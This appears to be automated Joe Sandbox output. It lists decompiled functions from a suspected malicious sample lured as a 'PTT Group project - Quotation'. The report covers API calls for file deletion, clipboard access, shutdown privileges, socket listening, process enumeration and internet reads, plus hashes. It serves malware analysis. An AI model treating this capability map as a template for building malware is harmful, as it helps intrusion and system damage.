VariantInit.OLEAUT32(?), ref: 00988890
VariantClear.OLEAUT32(?), ref: 009888F1

Strings

Failed to create object, xrefs: 0098878E, 00988844
NULL Pointer assignment, xrefs: 009887C8
Invalid parameter, xrefs: 0098880F

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 225f6d7ec3eddd179d72e9dba4eb43dca4af4e48d496c71c1400e7b2d461ca27
Instruction ID: 0565618252c2620f100bf96fe822dc62a30ea53661a73ce787030cbad0939486
Opcode Fuzzy Hash: 225f6d7ec3eddd179d72e9dba4eb43dca4af4e48d496c71c1400e7b2d461ca27
Instruction Fuzzy Hash: 1F619C706083019FD710EF64C848B6BBBE8AF88714F94481DF9959B391DB74ED44CBA2

Function 00984458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0098447F
EmptyClipboard.USER32 ref: 00984485
GlobalAlloc.KERNEL32(00000002,?), ref: 0098449A
CloseClipboard.USER32 ref: 00984539

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 3994fd71e58c4ad83368cab84641c7c78208aea1b43913c13aa1c16e363ed77d
Instruction ID: 62b04bba0769021b624694afcf20c60a42a98e0270e891e67c49ef2bd0f6f763
Opcode Fuzzy Hash: 3994fd71e58c4ad83368cab84641c7c78208aea1b43913c13aa1c16e363ed77d
Instruction Fuzzy Hash: FF219C35314215AFDB10AF68EC19B6DBBA8EF44720F10802BF946DB2B1CB35AC00DB54

Function 00973A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009148A1,?,?,009137C0,?), ref: 009148CE

Part of subcall function 00974CD3: GetFileAttributesW.KERNEL32(?,00973947), ref: 00974CD4

FindFirstFileW.KERNEL32(?,?), ref: 00973ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00973B87
MoveFileW.KERNEL32(?,?), ref: 00973B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00973BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00973BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00973BF5

Strings

\*.*, xrefs: 00973A8A, 00973A93, 00973AA8

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 2a06530d8f0d1141281f2ad6f067f5059959dcef1126912b055f8469d25bcbca
Instruction ID: c48625cf70b30799ec9bfd052199c5e41f160a920e90bcdcea0e75d99a0748e7
Opcode Fuzzy Hash: 2a06530d8f0d1141281f2ad6f067f5059959dcef1126912b055f8469d25bcbca
Instruction Fuzzy Hash: 8051813290514E9ACF15EBA0CD92AFDF779AF94300F6481A9E44677091EF306F49DBA0

Function 0097F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0097F6AB
Sleep.KERNEL32(0000000A), ref: 0097F6DB
_wcscmp.LIBCMT ref: 0097F6EF
_wcscmp.LIBCMT ref: 0097F70A
FindNextFileW.KERNEL32(?,?), ref: 0097F7A8
FindClose.KERNEL32(00000000), ref: 0097F7BE

Strings

*.*, xrefs: 0097F690

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 6accaab9a96079ff88c3e8eb2d3dd5a1ca3014cc600f68f0c1cd3a1a4c3227e8
Instruction ID: 2ac62df961faef22021da39822c59aa63f39e34c1ade95c3658d1c616e075a51
Opcode Fuzzy Hash: 6accaab9a96079ff88c3e8eb2d3dd5a1ca3014cc600f68f0c1cd3a1a4c3227e8
Instruction Fuzzy Hash: 9D415F7290420E9BDF15DF64CC95BEEBBB8FF45310F148566E819A61A0EB309E84CB91

Function 00924140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00957B0C
VUUU, xrefs: 00924520
VUUU, xrefs: 009244ED
VUUU, xrefs: 009244DB
ERCP, xrefs: 0092421F

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: d9915e5f35f5a14db011490815da6a5ab4f97fd059eae6bd270b8dbbd386165b
Instruction ID: 3726138b3aafc4ee8dc478eb72bb74875a68b3768d4c8f8ccd1c3102702eac5a
Opcode Fuzzy Hash: d9915e5f35f5a14db011490815da6a5ab4f97fd059eae6bd270b8dbbd386165b
Instruction Fuzzy Hash: 46A2D074E0422ACBDF24CF59E9807AEB7B5BF44305F1485AADC5AA7288D7349E85CF40

Function 009258C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00925A05
_memmove.LIBCMT ref: 00925A55
_memmove.LIBCMT ref: 00925ABB

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 6584ad2725cd5183028476efb63d941976042951c5b4b311b2cc65ca05c8f464
Instruction ID: 1568ce005cc1eee377d8f73d3d4619f7f0b6f6a2209a9bd639ad7a30f13c0fbb
Opcode Fuzzy Hash: 6584ad2725cd5183028476efb63d941976042951c5b4b311b2cc65ca05c8f464
Instruction Fuzzy Hash: BE129A70A00619EFDF14DFA4E981AEEB7F5FF88300F108569E406A7295EB35AD51CB50

Function 0097545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00968CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00968D0D
Part of subcall function 00968CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00968D3A
Part of subcall function 00968CC3: GetLastError.KERNEL32 ref: 00968D47

ExitWindowsEx.USER32(?,00000000), ref: 0097549B

Strings

, xrefs: 00975489
@, xrefs: 0097548E
SeShutdownPrivilege, xrefs: 0097546B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 102ba45fafed9364714f09601b9f1e447e18537449a6b3d4fffe089bfc625a68
Instruction ID: 33f5582036fde830675b865ddffd4a153df3ec13b522d073d5e5b461daed680d
Opcode Fuzzy Hash: 102ba45fafed9364714f09601b9f1e447e18537449a6b3d4fffe089bfc625a68
Instruction Fuzzy Hash: 8E014733A55B052AF7A86378DC4BBBB725CEB40343F268521FD0ED20E2DAD41C808190

Function 00986596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009865EF
WSAGetLastError.WSOCK32(00000000), ref: 009865FE
bind.WSOCK32(00000000,?,00000010), ref: 0098661A
listen.WSOCK32(00000000,00000005), ref: 00986629
WSAGetLastError.WSOCK32(00000000), ref: 00986643
closesocket.WSOCK32(00000000,00000000), ref: 00986657

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 72cc8b42cef1befebea38000ea441133f4e0eac1542b4a5cdc5f233fa959cbb4
Instruction ID: 9533a6ded29d0def35e9fa9f82a566045fa30eed91c107655055fbf9b839ffa4
Opcode Fuzzy Hash: 72cc8b42cef1befebea38000ea441133f4e0eac1542b4a5cdc5f233fa959cbb4
Instruction Fuzzy Hash: 5C21A0316002049FCB10EF68C959BAEB7A9EF85320F14815AF956EB3D1DB70AD41DB51

Function 00925680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00930FF6: std::exception::exception.LIBCMT ref: 0093102C
Part of subcall function 00930FF6: __CxxThrowException@8.LIBCMT ref: 00931041

_memmove.LIBCMT ref: 0096062F
_memmove.LIBCMT ref: 00960744
_memmove.LIBCMT ref: 009607EB

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: cac0d488307933bc438320c195b5af1ea58eee9d8b32cbf6af3751f21f487ed5
Instruction ID: 71046cff67416f62caa91a39a7d82817c4c714417c13c6d2b5bd186278ad5a1a
Opcode Fuzzy Hash: cac0d488307933bc438320c195b5af1ea58eee9d8b32cbf6af3751f21f487ed5
Instruction Fuzzy Hash: EA02AFB0E00209EBDF04DF64E991AAEBBB5FF84300F158069E806DB255EB35DE51DB91

Function 00911287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00912612: GetWindowLongW.USER32(?,000000EB), ref: 00912623

DefDlgProcW.USER32(?,?,?,?,?), ref: 009119FA
GetSysColor.USER32(0000000F), ref: 00911A4E
SetBkColor.GDI32(?,00000000), ref: 00911A61

Part of subcall function 00911290: DefDlgProcW.USER32(?,00000020,?), ref: 009112D8

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 9a0a11d6aec877b9e91705f30bccd887d202a1e3e6d4c2f27b0ac022c5c661d6
Instruction ID: 25a4a4e502d0da0cb8cc1275191d6425c1b782d92a680b93c812b373b94f039f
Opcode Fuzzy Hash: 9a0a11d6aec877b9e91705f30bccd887d202a1e3e6d4c2f27b0ac022c5c661d6
Instruction Fuzzy Hash: EDA15CB131654CBAEB28AB2C5C94EFF3D9DDF81341B14091AF642D51A1CA18DDC1D2B1

Function 00986A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009880A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009880CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00986AB1
WSAGetLastError.WSOCK32(00000000), ref: 00986ADA
bind.WSOCK32(00000000,?,00000010), ref: 00986B13
WSAGetLastError.WSOCK32(00000000), ref: 00986B20
closesocket.WSOCK32(00000000,00000000), ref: 00986B34

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: c12732a8b784caf3b99aefa81da624c2dd36ba3984894d02b63d8ce4a43c8344
Instruction ID: 04c82284ecd3a1772339c31628eb6f01754075860051f1af12d5e364f4dcdbc8
Opcode Fuzzy Hash: c12732a8b784caf3b99aefa81da624c2dd36ba3984894d02b63d8ce4a43c8344
Instruction Fuzzy Hash: 6641E375B40214AFEB10BF68DC96FBE77A99F84710F04805DF94AAB3C2CA709D408791

Function 009955FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0099564C
IsWindowEnabled.USER32 ref: 0099565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00995667
IsIconic.USER32 ref: 00995675
IsZoomed.USER32 ref: 00995683

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: e6b6f1c27784beb7ff72f6f11ffa705937a462660672bf1f46874d7361b9bc08
Instruction ID: 641776cfdfe0bf3ccec7b68918bcadd45681f338f59c767b267119cd5785abdc
Opcode Fuzzy Hash: e6b6f1c27784beb7ff72f6f11ffa705937a462660672bf1f46874d7361b9bc08
Instruction Fuzzy Hash: 5011C432300A146FEB221F2ADC54B6FB79DEF84721B464429F806D7251CB709D42CBA5

Function 0098C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00951D88,?), ref: 0098C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0098C324

Strings

kernel32.dll, xrefs: 0098C30D
GetSystemWow64DirectoryW, xrefs: 0098C31E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 4bdf6b01cf2740b55ad3c6c6962d3e4a9b701e4e05501896cf724cb8b8f19db2
Instruction ID: 4e26071af8d409d8212945dd6fd562794049f55db344e928763273649ea85c5b
Opcode Fuzzy Hash: 4bdf6b01cf2740b55ad3c6c6962d3e4a9b701e4e05501896cf724cb8b8f19db2
Instruction Fuzzy Hash: 36E0ECB4614713CFDB305F29D814A46B6D8EB4975AB90C43AE89AD3660E7B0D881CBA0

Function 00923190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 96a31cca0554f1666f1c7d0252f6850ea4bbeff5ea5e97daddc3a3099ff96d8e
Instruction ID: 81054a5b9aba523cba336d92aa0385d6d11b97a5d9521d914625be80afcbfbf2
Opcode Fuzzy Hash: 96a31cca0554f1666f1c7d0252f6850ea4bbeff5ea5e97daddc3a3099ff96d8e
Instruction Fuzzy Hash: AA228C716083119FC724DF64E891BAFB7E5AFC4310F10891DF89A97291DB74EA48CB92

Function 0098F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0098F151
Process32FirstW.KERNEL32(00000000,?), ref: 0098F15F

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

Process32NextW.KERNEL32(00000000,?), ref: 0098F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0098F22E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 4c0246970c93f161c43d33cf35ac1808e7fb872a752b77cb9c48071cb4417f6f
Instruction ID: 87608f5ff1014e1600e4b986d769acd2cc02b859033008c77bc26c567b5ec1b9
Opcode Fuzzy Hash: 4c0246970c93f161c43d33cf35ac1808e7fb872a752b77cb9c48071cb4417f6f
Instruction Fuzzy Hash: E7514D71608315AFD310EF24DC95BABBBE8EFD4710F50482DF49697291EB70A948CB92

Function 009740B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 009740D1
_memset.LIBCMT ref: 009740F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00974144
CloseHandle.KERNEL32(00000000), ref: 0097414D

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: bd7c5ba18963b140765a954bfcec4b353bc30a1c4ac0ae360de382d53e84fe18
Instruction ID: affdd998b7b6ab0657f18b9ec0f00ae3450f562817354dd9fe0db924453d3e0f
Opcode Fuzzy Hash: bd7c5ba18963b140765a954bfcec4b353bc30a1c4ac0ae360de382d53e84fe18
Instruction Fuzzy Hash: B511CA76901228BAD7309BA5AC4DFABBB7CEF44760F1045AAF908D7180D6744E80CBA4

Function 0096EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0096EB19

Strings

|, xrefs: 0096EB49
(, xrefs: 0096EB5F

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 645e0d611aea5620868d7f1d4cd8f5c2b760ae6596d3a89e0e4d8ac0713917bf
Instruction ID: ce7e09b7e39ec03cdcef9bab6c4c6736d1ad4231ab9b977de0fa2c17936f5a99
Opcode Fuzzy Hash: 645e0d611aea5620868d7f1d4cd8f5c2b760ae6596d3a89e0e4d8ac0713917bf
Instruction Fuzzy Hash: 43323579A006059FDB28CF29D491A6AB7F0FF48310B15C46EE89ADB3A1E770E941CB44

Function 009825E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 009826D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0098270C

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

